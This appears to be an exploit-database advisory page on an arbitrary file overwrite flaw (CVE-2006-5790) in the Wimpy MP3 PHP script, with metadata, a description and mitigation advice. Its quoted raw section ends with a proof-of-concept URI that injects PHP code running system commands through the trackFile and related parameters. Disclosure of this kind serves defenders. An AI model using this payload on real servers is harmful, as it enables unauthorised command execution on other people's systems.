header-logo
Suggest Exploit
vendor:
Wimpy MP3
by:
Unknown
6.5
CVSS
MEDIUM
Arbitrary File Overwrite
22
CWE
Product Name: Wimpy MP3
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: CVE-2006-5790
CPE: a:wimpy:mp3
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2006

Arbitrary File Overwrite in Wimpy MP3

The Wimpy MP3 application is vulnerable to an arbitrary file overwrite weakness. An attacker can exploit this vulnerability by providing malicious data through the 'trackFile' parameter in the 'wimpy_trackplays.php' script. This can lead to the overwrite of a text file with attacker-supplied content. Successful exploitation of this vulnerability can assist an attacker in further attacks.

Mitigation:

It is recommended to update to a patched version of the Wimpy MP3 application. Additionally, input validation should be implemented to prevent the execution of arbitrary commands or overwriting of files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16696/info

Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data.

Successful exploitation of this issue may aid an attacker in further attacks.

The following proof of concept URI is available:
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>